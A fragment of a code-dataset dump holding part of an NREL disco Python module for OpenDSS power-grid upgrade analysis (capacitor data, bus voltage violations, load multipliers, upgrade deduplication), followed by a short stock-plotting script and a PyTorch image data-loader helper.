all_df.index.str.split(\".\").str[1]\r\n all_df[\"equipment_type\"] = all_df.index.str.split(\".\").str[0]\r\n float_columns = [\"phases\", \"kv\"]\r\n all_df[float_columns] = all_df[float_columns].astype(float)\r\n all_df = all_df.reset_index(drop=True).set_index(\"capacitor_name\")\r\n # collect capcontrol information to combine with capcontrols\r\n capcontrol_df = get_cap_control_info()\r\n capcontrol_df.rename(columns={'name': 'capcontrol_name', 'capacitor': 'capacitor_name', 'type': 'capcontrol_type',\r\n 'equipment_type': 'capcontrol_present'}, inplace=True)\r\n capcontrol_df = capcontrol_df.set_index(\"capacitor_name\")\r\n # with capacitor name as index, concatenate capacitor information with cap controls\r\n all_df = pd.concat([all_df, capcontrol_df], axis=1)\r\n all_df.index.name = 'capacitor_name'\r\n all_df = all_df.reset_index().set_index('capacitor_name')\r\n \r\n if correct_PT_ratio and (len(capcontrol_df) > 0):\r\n if nominal_voltage is None:\r\n raise Exception(\"Nominal voltage not provided to correct capacitor bank PT ratio.\")\r\n all_df['old_PTratio'] = all_df['PTratio']\r\n \r\n # iterate over all capacitors\r\n for index, row in all_df.iterrows():\r\n all_df.at[index, \"kvar\"] = [float(a) for a in row[\"kvar\"]][0]\r\n # if capcontrol type is empty, then that capacitor does not have controls\r\n # correct PT ratios for existing cap controls\r\n if correct_PT_ratio and (len(capcontrol_df) > 0):\r\n if row[\"phases\"] > 1 and row[\"conn\"].lower() == \"wye\":\r\n kv_to_be_used = (row['kv'] * 1000) / math.sqrt(3)\r\n else:\r\n kv_to_be_used = row['kv'] * 1000\r\n all_df.at[index, \"PTratio\"] = kv_to_be_used / nominal_voltage\r\n return all_df.reset_index()\r\n\r\n\r\ndef get_cap_control_info():\r\n \"\"\"This collects capacitor control information\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n all_df = dss.utils.class_to_dataframe(\"capcontrol\")\r\n if len(all_df) == 0:\r\n capcontrol_columns = [\"name\", \"equipment_type\", \"element\", \"terminal\", \"capacitor\", \r\n \"type\", \"PTratio\", \"CTratio\", \"ONsetting\", \"OFFsetting\", \"Delay\", \r\n \"VoltOverride\", \"Vmax\", \"Vmin\", \"DelayOFF\", \"DeadTime\", \"CTPhase\", \r\n \"PTPhase\", \"VBus\", \"EventLog\", \"UserModel\", \"UserData\", \"pctMinkvar\", \r\n \"Reset\", \"basefreq\", \"enabled\", \"like\"]\r\n return pd.DataFrame(columns=capcontrol_columns)\r\n check_enabled_property(all_df, element_name=\"capcontrol\")\r\n all_df[\"name\"] = all_df.index.str.split(\".\").str[1]\r\n all_df[\"equipment_type\"] = all_df.index.str.split(\".\").str[0]\r\n CAPCONTROL_FLOAT_FIELDS = [\"CTratio\", \"DeadTime\", \"Delay\", \"DelayOFF\", \"OFFsetting\", \"ONsetting\", \"PTratio\",\r\n \"Vmax\", \"Vmin\"]\r\n all_df[CAPCONTROL_FLOAT_FIELDS] = all_df[CAPCONTROL_FLOAT_FIELDS].astype(float)\r\n all_df = all_df.reset_index(drop=True).set_index(\"name\")\r\n return all_df.reset_index()\r\n\r\n\r\ndef get_line_geometry():\r\n \"\"\"This collects all line geometry information\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n active_class_name = 'linegeometry'\r\n all_df = dss.utils.class_to_dataframe(active_class_name)\r\n if len(all_df) == 0:\r\n return pd.DataFrame()\r\n all_df['name'] = all_df.index.str.split('.').str[1]\r\n all_df['equipment_type'] = all_df.index.str.split('.').str[0]\r\n all_df.reset_index(inplace=True, drop=True)\r\n all_df[DSS_LINEGEOMETRY_FLOAT_FIELDS] = all_df[DSS_LINEGEOMETRY_FLOAT_FIELDS].astype(\"float\")\r\n all_df[DSS_LINEGEOMETRY_INT_FIELDS] = all_df[DSS_LINEGEOMETRY_INT_FIELDS].astype(\"int\")\r\n all_df = all_df[list(LineGeometryCatalogModel.schema(True).get(\"properties\").keys())]\r\n return all_df\r\n\r\n\r\ndef get_line_code():\r\n \"\"\"This collects all line codes information\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n active_class_name = 'linecode'\r\n all_df = dss.utils.class_to_dataframe(active_class_name)\r\n if len(all_df) == 0:\r\n return pd.DataFrame()\r\n all_df['name'] = all_df.index.str.split('.').str[1]\r\n all_df['equipment_type'] = all_df.index.str.split('.').str[0]\r\n all_df.reset_index(inplace=True, drop=True)\r\n all_df[DSS_LINECODE_FLOAT_FIELDS] = all_df[DSS_LINECODE_FLOAT_FIELDS].astype(\"float\")\r\n all_df[DSS_LINECODE_INT_FIELDS] = all_df[DSS_LINECODE_INT_FIELDS].astype(\"int\")\r\n all_df = all_df[list(LineCodeCatalogModel.schema(True).get(\"properties\").keys())]\r\n return all_df\r\n\r\n\r\ndef get_wire_data():\r\n \"\"\"This collects all wire data information\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n active_class_name = 'wiredata'\r\n all_df = dss.utils.class_to_dataframe(active_class_name)\r\n if len(all_df) == 0:\r\n return pd.DataFrame()\r\n all_df['name'] = all_df.index.str.split('.').str[1]\r\n all_df['equipment_type'] = all_df.index.str.split('.').str[0]\r\n all_df.reset_index(inplace=True, drop=True)\r\n return all_df\r\n\r\n\r\ndef get_cn_data():\r\n \"\"\"This collects all cn data information\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n active_class_name = 'cndata'\r\n all_df = dss.utils.class_to_dataframe(active_class_name)\r\n if len(all_df) == 0:\r\n return pd.DataFrame()\r\n all_df['name'] = all_df.index.str.split('.').str[1]\r\n all_df['equipment_type'] = all_df.index.str.split('.').str[0]\r\n all_df.reset_index(inplace=True, drop=True)\r\n return all_df\r\n\r\n\r\ndef check_dss_run_command(command_string):\r\n \"\"\"Runs dss command\r\n And checks for exception\r\n\r\n Parameters\r\n ----------\r\n command_string : str\r\n dss command to be run\r\n\r\n Raises\r\n -------\r\n OpenDssCompileError\r\n Raised if the command fails\r\n\r\n \"\"\"\r\n logger.debug(f\"Running DSS command: {command_string}\")\r\n result = dss.Text.Command(f\"{command_string}\")\r\n if result is not None:\r\n raise OpenDssCompileError(f\"OpenDSS run_command failed with message: {result}. \\nCommand: {command_string}\")\r\n\r\n\r\n@track_timing(timer_stats_collector)\r\ndef get_bus_voltages(voltage_upper_limit, voltage_lower_limit, raise_exception=True, **kwargs):\r\n \"\"\"This function determines the voltages, based on timepoint multiplier\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n timepoint_multipliers = kwargs.get(\"timepoint_multipliers\", None)\r\n multiplier_type = kwargs.get(\"multiplier_type\", LoadMultiplierType.ORIGINAL)\r\n # if there are no multipliers, run on rated load i.e. multiplier=1. 0\r\n # if compute_loading is false, then just run once (no need to check multipliers)\r\n if (timepoint_multipliers is None) or (multiplier_type == LoadMultiplierType.ORIGINAL): \r\n if multiplier_type != LoadMultiplierType.ORIGINAL:\r\n apply_uniform_timepoint_multipliers(multiplier_name=1, field=\"with_pv\", **kwargs)\r\n # determine voltage violations after changes\r\n bus_voltages_df, undervoltage_bus_list, overvoltage_bus_list, buses_with_violations = get_bus_voltages_instance(\r\n voltage_upper_limit=voltage_upper_limit, voltage_lower_limit=voltage_lower_limit, raise_exception=raise_exception, \r\n **kwargs)\r\n return bus_voltages_df, undervoltage_bus_list, overvoltage_bus_list, buses_with_violations\r\n if multiplier_type == LoadMultiplierType.UNIFORM:\r\n comparison_dict = {}\r\n for pv_field in timepoint_multipliers[\"load_multipliers\"].keys():\r\n logger.debug(pv_field)\r\n for multiplier_name in timepoint_multipliers[\"load_multipliers\"][pv_field]:\r\n logger.debug(\"Multipler name: %s\", multiplier_name)\r\n # this changes the dss network load and pv\r\n apply_uniform_timepoint_multipliers(multiplier_name=multiplier_name, field=pv_field, **kwargs)\r\n bus_voltages_df, undervoltage_bus_list, overvoltage_bus_list, buses_with_violations = get_bus_voltages_instance(\r\n voltage_upper_limit=voltage_upper_limit, voltage_lower_limit=voltage_lower_limit, raise_exception=raise_exception, **kwargs)\r\n bus_voltages_df.set_index(\"name\", inplace=True)\r\n comparison_dict[pv_field+\"_\"+str(multiplier_name)] = bus_voltages_df\r\n # compare all dataframe, and create one that contains all worst loading conditions (across all multiplier conditions)\r\n deciding_column_dict = {\"max_per_unit_voltage\": \"max\", \"min_per_unit_voltage\": \"min\"}\r\n bus_voltages_df, undervoltage_bus_list, overvoltage_bus_list, buses_with_violations = compare_multiple_dataframes_voltage(comparison_dict=comparison_dict, \r\n deciding_column_dict=deciding_column_dict,\r\n voltage_upper_limit=voltage_upper_limit,\r\n voltage_lower_limit=voltage_lower_limit)\r\n else:\r\n raise Exception(f\"Undefined multiplier_type {multiplier_type} passed.\") \r\n return bus_voltages_df, undervoltage_bus_list, overvoltage_bus_list, buses_with_violations\r\n \r\n\r\n@track_timing(timer_stats_collector)\r\ndef get_bus_voltages_instance(voltage_upper_limit, voltage_lower_limit, raise_exception=True, **kwargs):\r\n \"\"\"This computes per unit voltages for all buses in network\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n circuit_solve_and_check(raise_exception=raise_exception, **kwargs) # this is added as a final check for convergence\r\n all_dict = {}\r\n all_bus_names = dss.Circuit.AllBusNames()\r\n for bus_name in all_bus_names:\r\n dss.Circuit.SetActiveBus(bus_name)\r\n data_dict = {\r\n \"name\": bus_name,\r\n \"voltages\": dss.Bus.puVmagAngle()[::2],\r\n # \"kvbase\": dss.Bus.kVBase(),\r\n }\r\n data_dict[\"max_per_unit_voltage\"] = max(data_dict[\"voltages\"])\r\n data_dict[\"min_per_unit_voltage\"] = min(data_dict[\"voltages\"])\r\n data_dict['phase_imbalance'] = data_dict[\"max_per_unit_voltage\"] - data_dict[\"min_per_unit_voltage\"]\r\n\r\n # check for overvoltage violation\r\n if data_dict[\"max_per_unit_voltage\"] > voltage_upper_limit:\r\n data_dict['overvoltage_violation'] = True\r\n data_dict[\"max_voltage_deviation\"] = data_dict[\"max_per_unit_voltage\"] - voltage_upper_limit\r\n else:\r\n data_dict['overvoltage_violation'] = False\r\n data_dict[\"max_voltage_deviation\"] = 0.0\r\n\r\n # check for undervoltage violation\r\n if data_dict[\"min_per_unit_voltage\"] < voltage_lower_limit:\r\n data_dict['undervoltage_violation'] = True\r\n data_dict[\"min_voltage_deviation\"] = voltage_lower_limit - data_dict[\"min_per_unit_voltage\"]\r\n else:\r\n data_dict['undervoltage_violation'] = False\r\n data_dict[\"min_voltage_deviation\"] = 0.0\r\n all_dict[data_dict[\"name\"]] = data_dict\r\n\r\n all_df = pd.DataFrame.from_dict(all_dict, orient='index').reset_index(drop=True)\r\n undervoltage_bus_list = list(all_df.loc[all_df['undervoltage_violation'] == True]['name'].unique())\r\n overvoltage_bus_list = list(all_df.loc[all_df['overvoltage_violation'] == True]['name'].unique())\r\n buses_with_violations = list(set(undervoltage_bus_list + overvoltage_bus_list))\r\n return all_df, undervoltage_bus_list, overvoltage_bus_list, buses_with_violations\r\n\r\n\r\ndef compare_multiple_dataframes_voltage(comparison_dict, deciding_column_dict, voltage_upper_limit, voltage_lower_limit):\r\n \"\"\"This function compares all dataframes in a given dictionary based on a deciding column \r\n\r\n Returns\r\n -------\r\n Dataframe\r\n \"\"\"\r\n all_df = pd.DataFrame()\r\n for deciding_column_name in deciding_column_dict.keys():\r\n summary_df = pd.DataFrame()\r\n comparison_type = deciding_column_dict[deciding_column_name]\r\n for df_name in comparison_dict.keys():\r\n label_df = pd.DataFrame()\r\n summary_df[df_name] = comparison_dict[df_name][deciding_column_name]\r\n if comparison_type == \"max\":\r\n label_df[deciding_column_name] = summary_df.idxmax(axis=1) # find dataframe name that has max \r\n elif comparison_type == \"min\":\r\n label_df[deciding_column_name] = summary_df.idxmin(axis=1) # find dataframe name that has min \r\n else:\r\n raise Exception(f\"Unknown comparison type {comparison_type} passed.\")\r\n final_list = []\r\n for index, row in label_df.iterrows(): # index is element name\r\n label = row[deciding_column_name]\r\n temp_dict = {deciding_column_name: comparison_dict[label].loc[index][deciding_column_name]}\r\n temp_dict.update({\"name\": index})\r\n final_list.append(temp_dict)\r\n temp_df = pd.DataFrame(final_list)\r\n temp_df.set_index(\"name\", inplace=True)\r\n all_df = pd.concat([all_df, temp_df], axis=1)\r\n bus_voltages_df, undervoltage_bus_list, overvoltage_bus_list, buses_with_violations = get_voltage_violations(voltage_upper_limit=voltage_upper_limit, \r\n voltage_lower_limit=voltage_lower_limit, \r\n bus_voltages_df=all_df)\r\n return bus_voltages_df, undervoltage_bus_list, overvoltage_bus_list, buses_with_violations\r\n \r\n \r\ndef get_voltage_violations(voltage_upper_limit, voltage_lower_limit, bus_voltages_df):\r\n \"\"\"Function to determine voltage violations\r\n \"\"\"\r\n bus_voltages_df['overvoltage_violation'] = False\r\n bus_voltages_df['undervoltage_violation'] = False\r\n bus_voltages_df['max_voltage_deviation'] = 0.0\r\n bus_voltages_df['min_voltage_deviation'] = 0.0\r\n \r\n for index, row in bus_voltages_df.iterrows():\r\n # check for overvoltage violation\r\n if row[\"max_per_unit_voltage\"] > voltage_upper_limit:\r\n bus_voltages_df.at[index, 'overvoltage_violation'] = True\r\n bus_voltages_df.at[index, \"max_voltage_deviation\"] = row[\"max_per_unit_voltage\"] - voltage_upper_limit\r\n else:\r\n bus_voltages_df.at[index, 'overvoltage_violation'] = False\r\n bus_voltages_df.at[index, \"max_voltage_deviation\"] = 0.0\r\n\r\n # check for undervoltage violation\r\n if row[\"min_per_unit_voltage\"] < voltage_lower_limit:\r\n bus_voltages_df.at[index, 'undervoltage_violation'] = True\r\n bus_voltages_df.at[index, \"min_voltage_deviation\"] = voltage_lower_limit - row[\"min_per_unit_voltage\"]\r\n else:\r\n bus_voltages_df.at[index, 'undervoltage_violation'] = False\r\n bus_voltages_df.at[index, \"min_voltage_deviation\"] = 0.0\r\n \r\n bus_voltages_df.reset_index(inplace=True)\r\n undervoltage_bus_list = list(bus_voltages_df.loc[bus_voltages_df['undervoltage_violation'] == True]['name'].unique())\r\n overvoltage_bus_list = list(bus_voltages_df.loc[bus_voltages_df['overvoltage_violation'] == True]['name'].unique())\r\n buses_with_violations = list(set(undervoltage_bus_list + overvoltage_bus_list))\r\n return bus_voltages_df, undervoltage_bus_list, overvoltage_bus_list, buses_with_violations\r\n \r\n\r\ndef determine_available_line_upgrades(line_loading_df):\r\n \"\"\"This function creates a dataframe of available line upgrades by dropping duplicates from line dataframe passed.\r\n \"\"\"\r\n all_property_list = list(LineCatalogModel.schema(True).get(\"properties\").keys())\r\n determining_property_list = _extract_specific_model_properties_(model_name=LineCatalogModel, field_type_key=\"determine_upgrade_option\", field_type_value=True)\r\n line_loading_df[\"kV\"] = line_loading_df[\"kV\"].round(5)\r\n if 'line_definition_type' not in line_loading_df.columns: # add line_definition_type if not present\r\n line_loading_df = add_info_line_definition_type(line_loading_df)\r\n if 'line_placement' not in line_loading_df.columns:\r\n for index, row in line_loading_df.iterrows(): # add line_placement and h if not present\r\n info_dict = determine_line_placement(row)\r\n for key in info_dict.keys():\r\n line_loading_df.at[index, key] = info_dict[key] \r\n line_upgrade_options = line_loading_df[all_property_list]\r\n # remove duplicate line upgrade options (that might have a different name, but same parameters)\r\n line_upgrade_options = line_upgrade_options.loc[line_upgrade_options.astype(str).drop_duplicates(subset=determining_property_list, keep=\"first\").index]\r\n line_upgrade_options.reset_index(drop=True, inplace=True)\r\n if not line_upgrade_options[\"name\"].is_unique: # if line upgrade option names are not unique, create new names\r\n line_upgrade_options = line_upgrade_options.reset_index().rename(columns={'index': 'name'})\r\n line_upgrade_options['name'] = 'line_' + line_upgrade_options['name'].astype(str)\r\n return line_upgrade_options[all_property_list]\r\n\r\n\r\ndef determine_available_xfmr_upgrades(xfmr_loading_df):\r\n \"\"\"This function creates a dataframe of available transformer upgrades by dropping duplicates from transformer dataframe passed.\r\n Input dataframe will need to contain \"amp_limit_per_phase\" column. So if external catalog is supplied, ensure it contains that column.\r\n \"\"\"\r\n all_property_list = list(TransformerCatalogModel.schema(True).get(\"properties\").keys())\r\n determining_property_list = _extract_specific_model_properties_(model_name=TransformerCatalogModel, field_type_key=\"determine_upgrade_option\", field_type_value=True)\r\n xfmr_upgrade_options = xfmr_loading_df[all_property_list]\r\n xfmr_upgrade_options = xfmr_upgrade_options.loc[xfmr_upgrade_options.astype(str).drop_duplicates(subset=determining_property_list, keep=\"first\").index]\r\n xfmr_upgrade_options.reset_index(drop=True, inplace=True)\r\n if not xfmr_upgrade_options[\"name\"].is_unique: # if xfmr upgrade option names are not unique, create new names\r\n xfmr_upgrade_options = xfmr_upgrade_options.reset_index().rename(columns={'index': 'name'})\r\n xfmr_upgrade_options['name'] = 'xfmr_' + xfmr_upgrade_options['name'].astype(str)\r\n return xfmr_upgrade_options\r\n\r\n\r\ndef remove_duplicate_line_upgrades(line_upgrades_df):\r\n if line_upgrades_df.empty:\r\n return line_upgrades_df\r\n upgrades_subset = line_upgrades_df.loc[line_upgrades_df[\"action\"] == \"add\"]\r\n duplicate_equip = list(upgrades_subset[upgrades_subset.final_equipment_name.duplicated()].final_equipment_name.unique())\r\n if not duplicate_equip:\r\n return line_upgrades_df\r\n upgrades_subset = upgrades_subset.groupby('final_equipment_name', group_keys=False).apply(lambda df: df.fillna(method='ffill'))\r\n upgrades_subset = upgrades_subset.loc[upgrades_subset[\"final_equipment_name\"].duplicated(keep=False)]\r\n duplicates_final = upgrades_subset.loc[upgrades_subset[\"upgrade_type\"] == \"upgrade\"]\r\n duplicates_final = duplicates_final.sort_values(\"normamps\", ascending=False)\r\n duplicates_final = duplicates_final.drop_duplicates(subset=[\"upgrade_type\", \"action\", \"final_equipment_name\"], keep=\"first\") # drop any duplicate rows, keeping highest rating\r\n duplicates_final[\"upgrade_type\"] = \"new_parallel\"\r\n duplicates_final = duplicates_final.drop(columns=[\"original_equipment_name\"])\r\n # get original equipment name : \r\n og = upgrades_subset.loc[upgrades_subset[\"upgrade_type\"] == \"new_parallel\"].set_index(\"final_equipment_name\")[[\"original_equipment_name\"]]\r\n duplicates_final = pd.concat([duplicates_final.set_index(\"final_equipment_name\"), og], axis=1).reset_index()\r\n \r\n # keep all non-duplicated\r\n final_line_upgrades_df = line_upgrades_df.loc[~(line_upgrades_df[\"final_equipment_name\"].isin(duplicate_equip))]\r\n final_line_upgrades_df = pd.concat([final_line_upgrades_df, duplicates_final])\r\n return final_line_upgrades_df\r\n \r\n \r\ndef remove_duplicate_transformer_upgrades(xfmr_upgrades_df):\r\n if xfmr_upgrades_df.empty:\r\n return xfmr_upgrades_df\r\n upgrades_subset = xfmr_upgrades_df.loc[xfmr_upgrades_df[\"action\"] == \"add\"]\r\n duplicate_equip = list(upgrades_subset[upgrades_subset.final_equipment_name.duplicated()].final_equipment_name.unique())\r\n if not duplicate_equip:\r\n return xfmr_upgrades_df\r\n upgrades_subset = upgrades_subset.groupby('final_equipment_name', group_keys=False).apply(lambda df: df.fillna(method='ffill'))\r\n upgrades_subset = upgrades_subset.loc[upgrades_subset[\"final_equipment_name\"].duplicated(keep=False)]\r\n duplicates_final = upgrades_subset.loc[upgrades_subset[\"upgrade_type\"] == \"upgrade\"]\r\n duplicates_final = duplicates_final.sort_values(\"kVA\", ascending=False)\r\n duplicates_final = duplicates_final.drop_duplicates(subset=[\"upgrade_type\", \"action\", \"final_equipment_name\"], keep=\"first\") # drop any duplicate rows, keeping highest rating\r\n duplicates_final[\"upgrade_type\"] = \"new_parallel\"\r\n duplicates_final = duplicates_final.drop(columns=\"original_equipment_name\")\r\n # get original equipment name : \r\n og = upgrades_subset.loc[upgrades_subset[\"upgrade_type\"] == \"new_parallel\"].set_index(\"final_equipment_name\")[[\"original_equipment_name\"]]\r\n duplicates_final = pd.concat([duplicates_final.set_index(\"final_equipment_name\"), og], axis=1).reset_index()\r\n \r\n # keep all non-duplicated\r\n final_xfmr_upgrades_df = xfmr_upgrades_df.loc[~(xfmr_upgrades_df[\"final_equipment_name\"].isin(duplicate_equip))]\r\n final_xfmr_upgrades_df = pd.concat([final_xfmr_upgrades_df, duplicates_final])\r\n return final_xfmr_upgrades_df\r\n\r\n\r\ndef get_pv_buses(dss):\r\n pv_buses = []\r\n flag = dss.PVsystems.First()\r\n while flag > 0:\r\n pv_buses.append(dss.Properties.Value('bus1').split('.')[0])\r\n flag = dss.PVsystems.Next()\r\n return pv_buses\r\n\r\n\r\ndef get_load_buses(dss):\r\n load_buses = []\r\n flag = dss.Loads.First()\r\n while flag > 0:\r\n load_buses.append(dss.Properties.Value('bus1').split('.')[0])\r\n flag = dss.Loads.Next()\r\n return load_buses\r\n\r\n\r\ndef get_bus_coordinates():\r\n \"\"\"This function creates a dataframe of all buses in the circuit with their x and y coordinates\r\n\r\n Returns\r\n -------\r\n\r\n \"\"\"\r\n all_bus_names = dss.Circuit.AllBusNames()\r\n buses_list = []\r\n for b in all_bus_names:\r\n bus_dict = {}\r\n dss.Circuit.SetActiveBus(b)\r\n bus_dict['bus_name'] = b.lower()\r\n bus_dict['x_coordinate'] = dss.Bus.X()\r\n bus_dict['y_coordinate'] = dss.Bus.Y()\r\n buses_list.append(bus_dict)\r\n bus_coordinates_df = pd.DataFrame(buses_list)\r\n if all(bus_coordinates_df[\"x_coordinate\"].unique() == [0]) and all( bus_coordinates_df[\"y_coordinate\"].unique() == [0]):\r\n logger.info(\"Buscoordinates not provided for feeder model.\")\r\n return bus_coordinates_df\r\n\r\n\r\ndef convert_summary_dict_to_df(summary_dict):\r\n df = pd.DataFrame.from_dict(summary_dict, orient='index')\r\n df.index.name = \"stage\"\r\n return df\r\n\r\n\r\ndef filter_dictionary(dict_data, wanted_keys):\r\n return {k: dict_data.get(k, None) for k in wanted_keys}\r\n\r\n\r\ndef compare_dict(old, new, properties_to_check=None):\r\n \"\"\"function to compare two dictionaries with same format. \r\n Only compares common elements present in both original and new dictionaries\r\n \r\n \"\"\"\r\n field_list = []\r\n change = {}\r\n sharedKeys = set(old.keys()).intersection(new.keys())\r\n if not sharedKeys: # if there are no shared keys, then exit function\r\n return change\r\n all_properties = old[list(sharedKeys)[0]].keys()\r\n if properties_to_check is None:\r\n # get all properties from first element of dictionary\r\n properties_to_check = all_properties\r\n else:\r\n properties_to_check = list(set(all_properties) & set(properties_to_check))\r\n for key in sharedKeys:\r\n change_flag = False\r\n for sub_field in properties_to_check:\r\n if pd.isna(old[key][sub_field]) and pd.isna(new[key][sub_field]):\r\n continue\r\n if old[key][sub_field] != new[key][sub_field]:\r\n change_flag = True\r\n field_list.append(sub_field)\r\n if change_flag:\r\n change[key] = field_list\r\n return change\r\n\r\n\r\ndef create_timepoint_multipliers_dict(timepoint_multipliers):\r\n \"\"\"Creates a dictionary with new load rating, for every property and multiplier.\r\n Currently, it only does this for loads. But can be modified to accommodate other elements like PV as well.\r\n In raw_dict, value can be accessed as follows:\r\n value = raw_dict[property_name][object_name][multiplier_name]\r\n \r\n In reformatted_dict (which is returned from this function), value can be accessed as follows:\r\n value = raw_dict[object_name][property_name][multiplier_name]\r\n This value will need to be assigned to the object and run.\r\n This hasnt been used yet.\r\n \r\n Returns\r\n -------\r\n dict\r\n \"\"\"\r\n for field in timepoint_multipliers.keys():\r\n if field == \"load_multipliers\":\r\n property_list = [\"kW\"]\r\n object_name = \"Load\"\r\n multiplier_list = []\r\n # get combined list of multipliers\r\n for key, value in timepoint_multipliers[field].items():\r\n multiplier_list = multiplier_list + value\r\n df = dss.utils.class_to_dataframe(object_name)\r\n df.reset_index(inplace=True)\r\n df['name'] = df['index'].str.split(\".\", expand=True)[1]\r\n name_list = list(df['name'].values)\r\n del df[\"index\"]\r\n df.set_index('name', inplace=True)\r\n raw_dict = {}\r\n for property in property_list:\r\n logger.debug(property)\r\n df[property] = df[property].astype(float)\r\n new_df = pd.DataFrame(index=name_list, columns=multiplier_list)\r\n new_df.index.name = 'name'\r\n for multiplier in multiplier_list:\r\n logger.debug(multiplier)\r\n new_df[multiplier] = df[property] * multiplier\r\n raw_dict[property] = new_df.T.to_dict()\r\n # reformat dictionary to create desired format\r\n reformatted_dict = {}\r\n for name in name_list:\r\n reformatted_dict[name] = {}\r\n for property in property_list:\r\n reformatted_dict[name][property] = raw_dict[property][name]\r\n else:\r\n raise Exception(f\"Timepoint multiplier has Unsupported key: {field}. Presently, key 'load_multipliers' is supported.\")\r\n return reformatted_dict\r\n\r\n\r\n@track_timing(timer_stats_collector)\r\ndef apply_timepoint_multipliers_dict(reformatted_dict, multiplier_name, property_list=None, field=\"load_multipliers\",\r\n **kwargs):\r\n \"\"\"This uses a dictionary with the format of output received from create_timepoint_multipliers_dict\r\n Currently, it only does works loads. But can be modified to accommodate other elements like PV as well.\r\n\r\n In input dict: value can be accessed as follows:\r\n value = raw_dict[object_name][property_name][multiplier_name]\r\n In this function, value will be assigned to corresponding property and run.\r\n This hasnt been used yet.\r\n \r\n Returns\r\n -------\r\n dict\r\n \"\"\"\r\n name_list = list(reformatted_dict.keys())\r\n if property_list is None:\r\n property_list = list(reformatted_dict[name_list[0]].keys())\r\n if field == \"load_multipliers\":\r\n flag = dss.Loads.First()\r\n while flag > 0:\r\n flag = dss.Loads.Next()\r\n name = dss.Loads.Name()\r\n if name not in name_list: # if load name is not present in dictionary keys, continue\r\n continue\r\n for property in property_list:\r\n value = reformatted_dict[name][property][multiplier_name]\r\n if property == \"kW\":\r\n dss.Loads.kW(value)\r\n else:\r\n raise Exception(f\"Property {property} not defined in multipliers dict\")\r\n circuit_solve_and_check(raise_exception=True, **kwargs)\r\n else:\r\n raise Exception(f\"Unsupported key in dictionary. Presently, load_multipliers is supported.\")\r\n return reformatted_dict\r\n\r\n\r\ndef apply_uniform_timepoint_multipliers(multiplier_name, field, **kwargs):\r\n \"\"\"This function applies a uniform mulitplier to all elements. \r\n Currently, the multiplier only does works on loads. But can be modified to accommodate other elements like PV as well.\r\n It has two options, 1) all pv is enabled. 2) all pv is disabled.\r\n \r\n Returns\r\n -------\r\n bool\r\n \"\"\"\r\n if field == \"with_pv\":\r\n check_dss_run_command(\"BatchEdit PVSystem..* Enabled=Yes\")\r\n elif field == \"without_pv\": \r\n check_dss_run_command(\"BatchEdit PVSystem..* Enabled=No\")\r\n else:\r\n raise Exception(f\"Unknown parameter {field} passed in uniform timepoint multiplier dict.\"\r\n f\"Acceptable values are 'with_pv', 'without_pv'\")\r\n check_dss_run_command(f\"set LoadMult = {multiplier_name}\")\r\n circuit_solve_and_check(raise_exception=True, **kwargs)\r\n return True\r\n","repo_name":"NREL/disco","sub_path":"disco/extensions/upgrade_simulation/upgrades/common_functions.py","file_name":"common_functions.py","file_ext":"py","file_size_in_byte":92378,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"35489171752","text":"import pandas as pd\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\n\nif len(sys.argv) < 3:\n print(\"usage: plot.py input.json output.png\")\njson_handle = sys.argv[1]\npng_handle = sys.argv[2]\nstock_data = pd.read_json(json_handle)\ny = stock_data['stock_percent'].T.values\nprint(y)\nprint(len(y))\nx = range(0, len(y))\nplt.plot(x, y, '')\nplt.savefig(png_handle)\n","repo_name":"jackylee/hsgt","sub_path":"hkex/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74170649169","text":"# pytorch_playground\nimport torch\nfrom torch.autograd import Variable\n# torchvision\nfrom torchvision import datasets\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom torchvision import transforms\n# more\nimport numpy as np\nimport copy\n\n\nimage_size = 224\n\nnormalize = transforms.Normalize(\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]\n )\n\ntransform_train = transforms.Compose([\n transforms.Resize(image_size),\n transforms.CenterCrop(image_size),\n transforms.ToTensor(),\n normalize\n])\n\ntransform_test = transforms.Compose([\n transforms.Resize(image_size),\n transforms.CenterCrop(image_size),\n transforms.ToTensor(),\n normalize\n])\n\ndef test_set(testset_path):\n test_dataset = datasets.ImageFolder(testset_path, transform_test)\n test_loader = torch.utils.data.DataLoader(test_dataset,\n batch_size=20,\n num_workers=1)\n return test_loader\n\ndef train_set_test_set(\n dataset_path,\n batch_size=1,\n val_set_ratio=0.3,\n random_seed=None,\n # image_size=224,\n num_workers=2\n):\n\n # trainset_path = dataset_path + 'train'\n trainset_path = dataset_path\n # testset_path = dataset_path + 'test'\n\n dataset_train = datasets.ImageFolder(trainset_path, transform_train)\n dataset_val = datasets.ImageFolder(trainset_path, transform_test)\n # dataset_test = datasets.ImageFolder(testset_path, transform_test)\n\n num_data = len(dataset_train)\n indices = list(range(num_data))\n split = int(np.floor(val_set_ratio * num_data))\n if random_seed:\n print('random seed is:', random_seed)\n np.random.seed(random_seed)\n np.random.shuffle(indices)\n np.random.seed()\n else:\n print('These is no random seed given.')\n np.random.shuffle(indices)\n\n train_idx, valid_idx = indices[split:], indices[:split]\n\n train_sampler = SubsetRandomSampler(train_idx)\n valid_sampler = SubsetRandomSampler(valid_idx)\n\n train_loader = torch.utils.data.DataLoader(\n dataset_train,\n batch_size=batch_size,\n sampler=train_sampler,\n num_workers=num_workers\n )\n\n val_loader = torch.utils.data.DataLoader(\n dataset_val,\n batch_size=batch_size,\n sampler=valid_sampler,\n num_workers=num_workers\n )\n\n dataset_loaders = {\n 0: train_loader,\n 1: val_loader,\n # 'test': test_loader\n }\n dataset_sizes = {\n 'train': len(train_idx),\n 'val': len(valid_idx),\n # 'test': len(test_idx)\n }\n dataset_classes = dataset_train.classes\n\n return dataset_loaders, dataset_sizes, 